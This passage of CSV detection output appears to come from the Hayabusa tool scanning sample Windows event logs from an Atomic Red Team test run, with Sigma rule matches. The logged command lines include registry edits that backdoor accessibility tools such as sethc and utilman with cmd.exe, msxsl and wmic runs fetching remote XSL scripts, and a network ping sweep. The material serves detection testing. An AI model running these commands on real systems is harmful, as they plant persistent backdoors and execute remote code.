powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:list : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view /domain : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net view : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.1 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.2 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.3 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.4 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.5 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.6 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.7 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent 